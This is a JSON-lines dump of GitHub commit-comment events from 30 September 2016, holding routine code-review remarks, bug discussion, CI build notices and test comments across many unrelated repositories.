{"id":"4642040722","type":"CommitCommentEvent","actor":{"login":"andyWqh"},"repo":{"name":"andyWqh/andyWqhProjects"},"payload":{"comment":{"id":19237677,"position":null,"line":null,"path":null,"commit_id":"e5f14e70c78687386a95d72881d144edd4c82297","created_at":"2016-09-30T08:09:11Z","updated_at":"2016-09-30T08:09:11Z","body":"test"}},"created_at":"2016-09-30T08:09:11Z"}
{"id":"4642040931","type":"CommitCommentEvent","actor":{"login":"wenerme"},"repo":{"name":"bytedeco/javacpp-presets"},"payload":{"comment":{"id":19237679,"position":null,"line":null,"path":null,"commit_id":"922299a4dbdd148c5b8f142209afab84b811a991","created_at":"2016-09-30T08:09:14Z","updated_at":"2016-09-30T08:09:14Z","body":"But I run that demo only output\r\n\r\n```\r\nProcess finished with exit code 133 (interrupted by signal 5: SIGTRAP)\r\n```"}},"created_at":"2016-09-30T08:09:14Z"}
{"id":"4642041693","type":"CommitCommentEvent","actor":{"login":"CFGrote"},"repo":{"name":"samoylv/WPG"},"payload":{"comment":{"id":19237680,"position":null,"line":null,"path":null,"commit_id":"9f5fd356a1fae583016d26c8d220bc26a2689f2b","created_at":"2016-09-30T08:09:25Z","updated_at":"2016-09-30T08:09:25Z","body":"yes but that's not going to happen so soon. let's be pragmatic.\n\n\nOn 09/30/2016 10:04 AM, SergeyYakubov wrote:\n> better would be fix bug, create a release with some number and comments,\n> and then hardwire to this release\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/samoylv/WPG/commit/9f5fd356a1fae583016d26c8d220bc26a2689f2b#commitcomment-19237632>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AOwoRxsQREWqzlR7sYmtNUFCokOFJYWWks5qvMJ9gaJpZM4KKzmo>.\n> \n\n-- \nDr. Carsten Fortmann-Grote\nScientist for Scientific Simulations / Wissenschaftler fuer\nwissenschaftliche Simulationen\nEuropean XFEL GmbH\nHolzkoppel 4\n22869 Schenefeld\nGermany\n\nPhone: +49 (0)40 8998-5603\nFax:   +49 (0)40 8998-1905\nEmail: carsten.grote@xfel.eu\nWeb: www.xfel.eu\n\nManaging Directors: Prof. Dr. Massimo Altarelli, Dr. Claudia Burger\n\nRegistered as European X-Ray Free-Electron Laser Facility GmbH\nat Amtsgericht Hamburg, HRB 111165\n\n"}},"created_at":"2016-09-30T08:09:25Z"}
{"id":"4642043089","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"apache/tomcat"},"payload":{"comment":{"id":19237685,"position":25,"line":1790,"path":"java/org/apache/catalina/Context.java","commit_id":"eb195bebac8239b994fa921aeedb136a93e4ccaf","created_at":"2016-09-30T08:09:45Z","updated_at":"2016-09-30T08:09:45Z","body":"Hi Mark,\r\n\r\nThanks for fixing the regression (for the context see http://jira.xwiki.org/browse/XWIKI-13556). However I see you committed on trunk and that it got into Tomcat 9.0.0 M10. Could you tell me if it was also backported to all the affected branches. Asking since the problem was happening for all Tomcat versions:\r\n\r\n>= 9.0.0.M5 for the 9.0.x branch\r\n>= 8.5.1 for the 8.5.x branch\r\n>= 8.0.34 for the 8.0.x branch\r\n>= 7.0.70 for the 7.0.x branch\r\n\r\nThanks!"}},"created_at":"2016-09-30T08:09:45Z"}
{"id":"4642044686","type":"CommitCommentEvent","actor":{"login":"NuclearCoder"},"repo":{"name":"Seluj78/General-C-Compiler"},"payload":{"comment":{"id":19237689,"position":30,"line":0,"path":"sources/basic_functions.c","commit_id":"c093e5078008e238d97197dcaaa79686d7344b85","created_at":"2016-09-30T08:10:11Z","updated_at":"2016-09-30T08:10:11Z","body":"why always recursive? T_T"}},"created_at":"2016-09-30T08:10:11Z"}
{"id":"4642046203","type":"CommitCommentEvent","actor":{"login":"saudet"},"repo":{"name":"bytedeco/javacpp-presets"},"payload":{"comment":{"id":19237692,"position":null,"line":null,"path":null,"commit_id":"922299a4dbdd148c5b8f142209afab84b811a991","created_at":"2016-09-30T08:10:32Z","updated_at":"2016-09-30T08:10:32Z","body":"That is probably caused by something else. Try to use `new OpenCVFrameGrabber(0)` directly instead of `FrameGrabber.createDefault(0)`"}},"created_at":"2016-09-30T08:10:32Z"}
{"id":"4642047579","type":"CommitCommentEvent","actor":{"login":"b1lb0"},"repo":{"name":"b1lb0/android-architecture"},"payload":{"comment":{"id":19237695,"position":null,"line":null,"path":null,"commit_id":"c1a01c6a0882857464138548567c7c36ecdc5c4a","created_at":"2016-09-30T08:10:50Z","updated_at":"2016-09-30T08:10:50Z","body":"Hi Jose, in advance thanks for you amazing work! Navigating on the project i find out a problem o this branch. The package \"databinding\" is missing, could you commit it and push on the repo? Thanks\r\n\r\nTobia"}},"created_at":"2016-09-30T08:10:50Z"}
{"id":"4642047975","type":"CommitCommentEvent","actor":{"login":"nmn"},"repo":{"name":"pcardune/flow-typed"},"payload":{"comment":{"id":19237697,"position":null,"line":null,"path":null,"commit_id":"a907359fb1163d6e31f844a23776c73a36c9e0b2","created_at":"2016-09-30T08:10:56Z","updated_at":"2016-09-30T08:10:56Z","body":"changes look good."}},"created_at":"2016-09-30T08:10:56Z"}
{"id":"4642049119","type":"CommitCommentEvent","actor":{"login":"balamyt92"},"repo":{"name":"balamyt92/InfoDesk"},"payload":{"comment":{"id":19237699,"position":null,"line":null,"path":null,"commit_id":"80adcfc9738647f1a3dcfdd51aa6c5a45c6c30b6","created_at":"2016-09-30T08:11:12Z","updated_at":"2016-09-30T08:11:12Z","body":"close issue #65 "}},"created_at":"2016-09-30T08:11:12Z"}
{"id":"4642054266","type":"CommitCommentEvent","actor":{"login":"wenerme"},"repo":{"name":"bytedeco/javacpp-presets"},"payload":{"comment":{"id":19237708,"position":null,"line":null,"path":null,"commit_id":"922299a4dbdd148c5b8f142209afab84b811a991","created_at":"2016-09-30T08:12:22Z","updated_at":"2016-09-30T08:12:22Z","body":"Done, thank you."}},"created_at":"2016-09-30T08:12:22Z"}
{"id":"4642058337","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19237713,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-30T08:13:23Z","updated_at":"2016-09-30T08:13:23Z","body":"I need the recovery log and the kmsg, no info=I don't know what's broken"}},"created_at":"2016-09-30T08:13:23Z"}
{"id":"4642061125","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19237718,"position":null,"line":null,"path":null,"commit_id":"3c3dc0caff8512d3d93211ecb83857c7d2603b58","created_at":"2016-09-30T08:14:05Z","updated_at":"2016-09-30T08:14:05Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1218 of 1219 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3c3dc0caff8512d3d93211ecb83857c7d2603b58-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3c3dc0caff8512d3d93211ecb83857c7d2603b58-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.92%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3c3dc0caff8512d3d93211ecb83857c7d2603b58-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.06%25-green.svg)</a>\n"}},"created_at":"2016-09-30T08:14:05Z"}
{"id":"4642062879","type":"CommitCommentEvent","actor":{"login":"ossilator"},"repo":{"name":"qtproject/qt-apps-qmllive"},"payload":{"comment":{"id":19237723,"position":null,"line":null,"path":null,"commit_id":"91a2b07422e24e44be071658e6cbeb6ea10e553c","created_at":"2016-09-30T08:14:32Z","updated_at":"2016-09-30T08:14:32Z","body":"the relevant developers don't read github comments. please use the bugtracker or a relevant mailing list.\r\n"}},"created_at":"2016-09-30T08:14:32Z"}
{"id":"4642066850","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19237732,"position":null,"line":null,"path":null,"commit_id":"9074b117d4c0e3575ae5c83e72f67de291aa572d","created_at":"2016-09-30T08:15:30Z","updated_at":"2016-09-30T08:15:30Z","body":"不能删吧，一旦是抛物线之类的运动的之后需要再飞回来怎么办。\r\n我觉的最好的方法就是对象还保存着只是不画在画布上了，刷新时还继续默默地计算着坐标。\r\n至于GC我打算只删掉屏幕之外的Died对象...\r\n现在头疼的是逻辑里if else嵌套太多了，好难看。\r\n\r\n![](https://assets-cdn.github.com/images/icons/emoji/unicode/1f602.png)\r\n"}},"created_at":"2016-09-30T08:15:30Z"}
{"id":"4642070061","type":"CommitCommentEvent","actor":{"login":"devasghar"},"repo":{"name":"devasghar/DrupalGap"},"payload":{"comment":{"id":19237742,"position":5,"line":176,"path":"src/modules/entity/entity.js","commit_id":"a831b5c3f9698f78ef3731d8b84a295e7074f52e","created_at":"2016-09-30T08:16:18Z","updated_at":"2016-09-30T08:16:18Z","body":"Ignore this commit, there is the second one  [L176](https://github.com/devasghar/DrupalGap/blob/815aaf004376d7eb08434949a2980fc7a5a0a611/src/modules/entity/entity.js#L176)"}},"created_at":"2016-09-30T08:16:18Z"}
{"id":"4642088422","type":"CommitCommentEvent","actor":{"login":"dogeyes"},"repo":{"name":"qizheng3/Queuing"},"payload":{"comment":{"id":19237788,"position":23,"line":23,"path":"test.c","commit_id":"10a3340e6598ab2edc8aeda0c14700e7ea91d280","created_at":"2016-09-30T08:20:43Z","updated_at":"2016-09-30T08:20:43Z","body":"这个不太对吧， 要用(node*) 把type cast到指针。"}},"created_at":"2016-09-30T08:20:43Z"}
{"id":"4642089232","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19237794,"position":null,"line":null,"path":null,"commit_id":"40d8547c346cd23ecdce9d537dd456545805c399","created_at":"2016-09-30T08:20:55Z","updated_at":"2016-09-30T08:20:55Z","body":"plz screenshot adventure setting"}},"created_at":"2016-09-30T08:20:55Z"}
{"id":"4642093409","type":"CommitCommentEvent","actor":{"login":"hebiao6446"},"repo":{"name":"goagent/goagent"},"payload":{"comment":{"id":19237806,"position":null,"line":null,"path":null,"commit_id":"e492ed0283f5cde7cf71d7ac47429f64aa48cd13","created_at":"2016-09-30T08:21:55Z","updated_at":"2016-09-30T08:21:55Z","body":"感谢一路有你，感谢背后默默奉献的工程师。。。\r\n"}},"created_at":"2016-09-30T08:21:55Z"}
{"id":"4642095889","type":"CommitCommentEvent","actor":{"login":"gsaki"},"repo":{"name":"gsaki/my-devtest-labs"},"payload":{"comment":{"id":19237811,"position":null,"line":null,"path":null,"commit_id":"a01808757d88c2291746b2c790ecdd25c9bf5fe3","created_at":"2016-09-30T08:22:32Z","updated_at":"2016-09-30T08:22:32Z","body":"sdfsdfsd"}},"created_at":"2016-09-30T08:22:32Z"}
{"id":"4642098691","type":"CommitCommentEvent","actor":{"login":"Saver12"},"repo":{"name":"java8-course/streams"},"payload":{"comment":{"id":19237817,"position":97,"line":111,"path":"src/test/java/part2/exercise/CollectorsExercise1.java","commit_id":"433bee09a5a40451ccdccb95b3144d88410a1b9e","created_at":"2016-09-30T08:23:14Z","updated_at":"2016-09-30T08:23:14Z","body":"fixed"}},"created_at":"2016-09-30T08:23:14Z"}
{"id":"4642099965","type":"CommitCommentEvent","actor":{"login":"tomliptrot"},"repo":{"name":"tomliptrot/memoise"},"payload":{"comment":{"id":19237822,"position":null,"line":null,"path":null,"commit_id":"fb71a1cb2d806a0ca5f8f45a556ecc759bfcf23d","created_at":"2016-09-30T08:23:33Z","updated_at":"2016-09-30T08:23:33Z","body":"Added the original function to the hash."}},"created_at":"2016-09-30T08:23:33Z"}
{"id":"4642100291","type":"CommitCommentEvent","actor":{"login":"Tejpbit"},"repo":{"name":"cthdidIT/itbio"},"payload":{"comment":{"id":19237823,"position":5,"line":48,"path":"frontend/src/components/loader/index.js","commit_id":"0571bb25d049aa28b45bc69b366e839d7c5ea922","created_at":"2016-09-30T08:23:38Z","updated_at":"2016-09-30T08:23:38Z","body":"unreachable code?"}},"created_at":"2016-09-30T08:23:38Z"}
{"id":"4642101456","type":"CommitCommentEvent","actor":{"login":"DarkSon09"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19237825,"position":null,"line":null,"path":null,"commit_id":"40d8547c346cd23ecdce9d537dd456545805c399","created_at":"2016-09-30T08:23:56Z","updated_at":"2016-09-30T08:23:56Z","body":"![image](https://cloud.githubusercontent.com/assets/22286735/18985362/b0f043a8-8721-11e6-8b5c-d2cee0a7e95a.png)\r\n\r\nDear dreammed,\r\nthis is my screenshot adventure setting."}},"created_at":"2016-09-30T08:23:56Z"}
{"id":"4642101947","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19237826,"position":null,"line":null,"path":null,"commit_id":"5344f831fbd578a1ec6bb032d8f8632c4a5de29f","created_at":"2016-09-30T08:24:03Z","updated_at":"2016-09-30T08:24:03Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1217](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14647&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T08:24:03Z"}
{"id":"4642104102","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19237829,"position":9,"line":153,"path":"xwiki-platform-core/xwiki-platform-rendering/xwiki-platform-rendering-macros/xwiki-platform-rendering-macro-context/src/main/java/org/xwiki/rendering/internal/macro/context/ContextMacro.java","commit_id":"2eee97c7196cd54bc3b3475e94e43566ce92dd88","created_at":"2016-09-30T08:24:33Z","updated_at":"2016-09-30T08:24:33Z","body":"This should at least be configurable because executing the translation for the document is very expensive (and potentially dangerous) when all you want to be executed in the context of the document and don't care about it's content."}},"created_at":"2016-09-30T08:24:33Z"}
{"id":"4642107757","type":"CommitCommentEvent","actor":{"login":"hebiao6446"},"repo":{"name":"goagent/goagent"},"payload":{"comment":{"id":19237833,"position":1,"line":1,"path":"README.md","commit_id":"e492ed0283f5cde7cf71d7ac47429f64aa48cd13","created_at":"2016-09-30T08:25:26Z","updated_at":"2016-09-30T08:25:26Z","body":"全球只有少数几个国家不能上Facebook  or  YouTube 分别是：伊朗（vpn普及无障碍）， 北朝鲜（貌似他们只有局域网）， 然后就是 天朝上国（原因不解释，各种封杀） "}},"created_at":"2016-09-30T08:25:26Z"}
{"id":"4642108624","type":"CommitCommentEvent","actor":{"login":"Daft-Freak"},"repo":{"name":"emscripten-ports/SDL2"},"payload":{"comment":{"id":19237839,"position":9,"line":539,"path":"src/video/emscripten/SDL_emscriptenevents.c","commit_id":"3358b1541c664ff28e5683bdbf42b2316e429b8c","created_at":"2016-09-30T08:25:40Z","updated_at":"2016-09-30T08:25:40Z","body":"Could just remove the check here.\r\n"}},"created_at":"2016-09-30T08:25:40Z"}
{"id":"4642110529","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19237844,"position":167,"line":235,"path":"main/exercice/oral_expression.class.php","commit_id":"72cd91d40f11a4488af9f60e1daee53bfafe0822","created_at":"2016-09-30T08:26:07Z","updated_at":"2016-09-30T08:26:07Z","body":"Why double $extension?"}},"created_at":"2016-09-30T08:26:07Z"}
{"id":"4642115079","type":"CommitCommentEvent","actor":{"login":"chayano"},"repo":{"name":"hola/translate"},"payload":{"comment":{"id":19237853,"position":6,"line":103,"path":"th.json","commit_id":"922615f66c248981fb90138bc2cb62086228ffd3","created_at":"2016-09-30T08:27:07Z","updated_at":"2016-09-30T08:27:07Z","body":"OK"}},"created_at":"2016-09-30T08:27:07Z"}
{"id":"4642117465","type":"CommitCommentEvent","actor":{"login":"gkahiu"},"repo":{"name":"gltn/stdm"},"payload":{"comment":{"id":19237856,"position":null,"line":null,"path":null,"commit_id":"c83975dd9e50c822fa35d16d675f0154f864f16e","created_at":"2016-09-30T08:27:40Z","updated_at":"2016-09-30T08:27:40Z","body":"@pgathogo, please see the updated `rename(old_value, updated_value, updated_code)` function [here](https://github.com/gltn/stdm/blob/master/data/configuration/value_list.py#L158)."}},"created_at":"2016-09-30T08:27:40Z"}
{"id":"4642119412","type":"CommitCommentEvent","actor":{"login":"amkatya"},"repo":{"name":"amkatya/java-tests"},"payload":{"comment":{"id":19237861,"position":5,"line":3,"path":"README.md","commit_id":"a5fe01db3c34ed775a5acb93d5c59d0bd0a2b002","created_at":"2016-09-30T08:28:08Z","updated_at":"2016-09-30T08:28:08Z","body":"oh"}},"created_at":"2016-09-30T08:28:08Z"}
{"id":"4642120120","type":"CommitCommentEvent","actor":{"login":"amkatya"},"repo":{"name":"amkatya/java-tests"},"payload":{"comment":{"id":19237864,"position":null,"line":null,"path":null,"commit_id":"a5fe01db3c34ed775a5acb93d5c59d0bd0a2b002","created_at":"2016-09-30T08:28:17Z","updated_at":"2016-09-30T08:28:17Z","body":"oh ok"}},"created_at":"2016-09-30T08:28:17Z"}
{"id":"4642121739","type":"CommitCommentEvent","actor":{"login":"kostyanich"},"repo":{"name":"raboof/connbeat"},"payload":{"comment":{"id":19237866,"position":5,"line":6,"path":"tcp_diag/tcp_diag_cgo.go","commit_id":"a4c34e9458d48d2d8abdbc488e50ab8b3ed5a61f","created_at":"2016-09-30T08:28:41Z","updated_at":"2016-09-30T08:28:41Z","body":"This does not work on master yet it always links dynamically, however on vendoring branch it links statically. This branch and change is not needed anymore if we continue with vendoring."}},"created_at":"2016-09-30T08:28:41Z"}
{"id":"4642122035","type":"CommitCommentEvent","actor":{"login":"lamtranthanh94"},"repo":{"name":"loclam812/SeminarChuyenDe"},"payload":{"comment":{"id":19237868,"position":null,"line":null,"path":null,"commit_id":"929b3d11cd259c90eede62b700d25ee91de2312b","created_at":"2016-09-30T08:28:45Z","updated_at":"2016-09-30T08:28:45Z","body":"info"}},"created_at":"2016-09-30T08:28:45Z"}
{"id":"4642122622","type":"CommitCommentEvent","actor":{"login":"Seluj78"},"repo":{"name":"Seluj78/General-C-Compiler"},"payload":{"comment":{"id":19237872,"position":30,"line":0,"path":"sources/basic_functions.c","commit_id":"c093e5078008e238d97197dcaaa79686d7344b85","created_at":"2016-09-30T08:28:52Z","updated_at":"2016-09-30T08:28:52Z","body":"Because it's the best for memory use\n\nLe 30 sept. 2016 10:10, \"NuclearCoder\" <notifications@github.com> a écrit :\n\n> why always recursive? T_T\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Seluj78/General-C-Compiler/commit/c093e5078008e238d97197dcaaa79686d7344b85#commitcomment-19237689>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEbSJXuQAOFBbJnE54sNMuXX4OoE4YZuks5qvMPjgaJpZM4KK1Rl>\n> .\n>\n"}},"created_at":"2016-09-30T08:28:52Z"}
{"id":"4642125178","type":"CommitCommentEvent","actor":{"login":"sijskes"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19237878,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-30T08:29:29Z","updated_at":"2016-09-30T08:29:29Z","body":"@aeickho how did you generate asm.lst with r2 v10?\r\n"}},"created_at":"2016-09-30T08:29:29Z"}
{"id":"4642127959","type":"CommitCommentEvent","actor":{"login":"Alucard24"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19237885,"position":null,"line":null,"path":null,"commit_id":"2049aea49dfba35371a15865ac2a09281883f38b","created_at":"2016-09-30T08:30:05Z","updated_at":"2016-09-30T08:30:05Z","body":"No sods for me... I also I have an external sd fat32 formatted. I tried to unmount and remount but no sods... If you look on my-MM-v10c-linux-3.18.y branch i have few commits more that I will merge soon..."}},"created_at":"2016-09-30T08:30:05Z"}
{"id":"4642129930","type":"CommitCommentEvent","actor":{"login":"GaryKeeble"},"repo":{"name":"betaflight/betaflight"},"payload":{"comment":{"id":19237888,"position":6,"line":1294,"path":"src/main/blackbox/blackbox.c","commit_id":"16ceed942b09fbe02ec523484dd4f758ec95a842","created_at":"2016-09-30T08:30:31Z","updated_at":"2016-09-30T08:30:31Z","body":"Boris,\r\nFor the blackbox header, what do you think about leaving the header lines as gyro_notch_hz, and gyro_notch_cutoff, but make the value a comma separated list %d,%d rather than a single value (just like the pid parameters above are logged)? Thus in the BB viewer we can detect whether it is a list of variables or just a single one... Add's the advantage that you could even go to a third notch if you wanted without too many things changing in the log header.....\r\n\r\ne.g. `BLACKBOX_PRINT_HEADER_LINE(\"gyro_notch_hz:%d,%d\",            (int)(masterConfig.gyro_soft_notch_hz_1 * 100.0f), (int)(masterConfig.gyro_soft_notch_hz_2 * 100.0f))`\r\n\r\nThere has also been something bugging me for a little while; a long time ago when we first extended the header, the frequencies in Hz could have a decimal; thus we scaled them by 100.0f and in BB viewer, unscaled them back so not to lose the decimal place; now, the frequencies are entered as a true integer (0 to 1000Hz ?) and this scaling would break for values > 327.68Hz? We could coordinate a modification to the blackbox and viewer to remove the 100.0f perhaps for BF3.1? "}},"created_at":"2016-09-30T08:30:31Z"}
{"id":"4642130616","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/cubbyHole"},"payload":{"comment":{"id":19237890,"position":null,"line":null,"path":null,"commit_id":"b2a5f9e9d1fb551710e104c1a844a9bf22d495d8","created_at":"2016-09-30T08:30:41Z","updated_at":"2016-09-30T08:30:41Z","body":"regfgdfgsdf"}},"created_at":"2016-09-30T08:30:41Z"}
{"id":"4642133493","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19237895,"position":167,"line":235,"path":"main/exercice/oral_expression.class.php","commit_id":"72cd91d40f11a4488af9f60e1daee53bfafe0822","created_at":"2016-09-30T08:31:21Z","updated_at":"2016-09-30T08:31:21Z","body":"Fixed.\r\n"}},"created_at":"2016-09-30T08:31:21Z"}
{"id":"4642135448","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19237905,"position":null,"line":null,"path":null,"commit_id":"c5a8f129c4002df9d53d18d0e196500a6c7083d5","created_at":"2016-09-30T08:31:48Z","updated_at":"2016-09-30T08:31:48Z","body":"To ensure I don't forget about it, I just brought this fix into the codebase (I also fixed the path)."}},"created_at":"2016-09-30T08:31:48Z"}
{"id":"4642136431","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19237906,"position":null,"line":null,"path":null,"commit_id":"ff4b2cd3986a7564d77711c329fcbb72b9024951","created_at":"2016-09-30T08:32:00Z","updated_at":"2016-09-30T08:32:00Z","body":"To ensure I don't forget about it, I just brought this fix into the codebase."}},"created_at":"2016-09-30T08:32:00Z"}
{"id":"4642136564","type":"CommitCommentEvent","actor":{"login":"DieHertz"},"repo":{"name":"Wind0r/blheli-configurator"},"payload":{"comment":{"id":19237907,"position":22,"line":22,"path":"src/actions/msp.js","commit_id":"f5b0b45057419b112026f91448a56732343e7249","created_at":"2016-09-30T08:32:02Z","updated_at":"2016-09-30T08:32:02Z","body":"I suggest minimizing allocations, MSP code in CF Configurator does it on purpose."}},"created_at":"2016-09-30T08:32:02Z"}
{"id":"4642138906","type":"CommitCommentEvent","actor":{"login":"itheof"},"repo":{"name":"itheof/42sh-posix"},"payload":{"comment":{"id":19237915,"position":null,"line":null,"path":null,"commit_id":"aeb0ef58f1dfffa0289b9d068c6648f1c28ba770","created_at":"2016-09-30T08:32:33Z","updated_at":"2016-09-30T08:32:33Z","body":"Please run `git submodule sync` in the project root."}},"created_at":"2016-09-30T08:32:33Z"}
{"id":"4642139418","type":"CommitCommentEvent","actor":{"login":"kevva"},"repo":{"name":"kevva/github-branches-cli"},"payload":{"comment":{"id":19237916,"position":10,"line":10,"path":"test.js","commit_id":"682a48bac442a3971605b8e3087911e860756b3c","created_at":"2016-09-30T08:32:41Z","updated_at":"2016-09-30T08:32:41Z","body":"That's true. Just an old habit I guess :)."}},"created_at":"2016-09-30T08:32:41Z"}
{"id":"4642140016","type":"CommitCommentEvent","actor":{"login":"MessiHL"},"repo":{"name":"MessiHL/test"},"payload":{"comment":{"id":19237917,"position":1,"line":1,"path":"doc2","commit_id":"5e4bb9e2feaee8e05509f35f135a342cce84e1cf","created_at":"2016-09-30T08:32:49Z","updated_at":"2016-09-30T08:32:49Z","body":"我现在又重新写了一行"}},"created_at":"2016-09-30T08:32:49Z"}
{"id":"4642145200","type":"CommitCommentEvent","actor":{"login":"DieHertz"},"repo":{"name":"Wind0r/blheli-configurator"},"payload":{"comment":{"id":19237924,"position":22,"line":22,"path":"src/reducers/msp.js","commit_id":"f5b0b45057419b112026f91448a56732343e7249","created_at":"2016-09-30T08:34:05Z","updated_at":"2016-09-30T08:34:05Z","body":"Wow, gross, why `+=`? :-D"}},"created_at":"2016-09-30T08:34:05Z"}
{"id":"4642145855","type":"CommitCommentEvent","actor":{"login":"xubinbrave"},"repo":{"name":"xubinbrave/test01"},"payload":{"comment":{"id":19237925,"position":1,"line":1,"path":"README.md","commit_id":"11da5a906be0897743b5d865757f36dbb6676a33","created_at":"2016-09-30T08:34:14Z","updated_at":"2016-09-30T08:34:14Z","body":"测试"}},"created_at":"2016-09-30T08:34:14Z"}
{"id":"4642147160","type":"CommitCommentEvent","actor":{"login":"AntumDeluge"},"repo":{"name":"Huluti/debreate"},"payload":{"comment":{"id":19237929,"position":null,"line":null,"path":null,"commit_id":"774a7740a47b47df0150ddf82bdaf8e7349f743f","created_at":"2016-09-30T08:34:30Z","updated_at":"2016-09-30T08:34:30Z","body":"Patched in at [e41b937](https://github.com/AntumDeluge/debreate/tree/e41b937)."}},"created_at":"2016-09-30T08:34:30Z"}
{"id":"4642153464","type":"CommitCommentEvent","actor":{"login":"sorig"},"repo":{"name":"karlnapf/kernel_exp_family"},"payload":{"comment":{"id":19237945,"position":39,"line":128,"path":"kernel_exp_family/estimators/full/gaussian.py","commit_id":"5135d8cfa3c884f773f3fbd029738bf59f443f95","created_at":"2016-09-30T08:36:01Z","updated_at":"2016-09-30T08:36:01Z","body":"Yes you're right. Don't know why I made this mistake. I'll update it"}},"created_at":"2016-09-30T08:36:01Z"}
{"id":"4642156829","type":"CommitCommentEvent","actor":{"login":"DjResty"},"repo":{"name":"danielapriltingal/jpmc-exercise-daniel"},"payload":{"comment":{"id":19237954,"position":15,"line":15,"path":"src/Main.java","commit_id":"2f2c4103d5e47745ea00d3dcaa913385f5228dfd","created_at":"2016-09-30T08:36:46Z","updated_at":"2016-09-30T08:36:46Z","body":"What's this? \r\nKindly remove that comment if it is unnecessary. \r\n\r\nThank you"}},"created_at":"2016-09-30T08:36:46Z"}
{"id":"4642158001","type":"CommitCommentEvent","actor":{"login":"lasconic"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":19237958,"position":null,"line":null,"path":null,"commit_id":"f5d98bb0b52e67c9514f8d17a8b83ebdfa2cf976","created_at":"2016-09-30T08:37:04Z","updated_at":"2016-09-30T08:37:04Z","body":"It's a work in progress. Oxygen is an old theme from Qt 4 that we imported in MuseScore, it's over 25k lines of c++, see the mstyle directory. Fusion is built in Qt 5. It should be easier to build a new color scheme on top of it. So I wanted to put it in, and see what people think about it. It's a basis.\r\n\r\nI will make a forum post in the tech preview forum. I hope that you can elaborate a bit more why you are not a fan in a comment. https://musescore.org/en/node/126606"}},"created_at":"2016-09-30T08:37:04Z"}
{"id":"4642164739","type":"CommitCommentEvent","actor":{"login":"lmbcosta"},"repo":{"name":"DLMFCUL/sd_projecto1"},"payload":{"comment":{"id":19237976,"position":null,"line":null,"path":null,"commit_id":"2bc693a536361d7b3cf82bb5bca8d4afb4bfd39c","created_at":"2016-09-30T08:38:34Z","updated_at":"2016-09-30T08:38:34Z","body":"Marcus porque fazes cast? Acho que não é preciso! só fizemos antes porque o malloc e calor eterna um apontador void. Tirando isso acho que não é preciso"}},"created_at":"2016-09-30T08:38:34Z"}
{"id":"4642167131","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19237983,"position":null,"line":null,"path":null,"commit_id":"5344f831fbd578a1ec6bb032d8f8632c4a5de29f","created_at":"2016-09-30T08:39:08Z","updated_at":"2016-09-30T08:39:08Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1217](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14647&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:15:05"}},"created_at":"2016-09-30T08:39:08Z"}
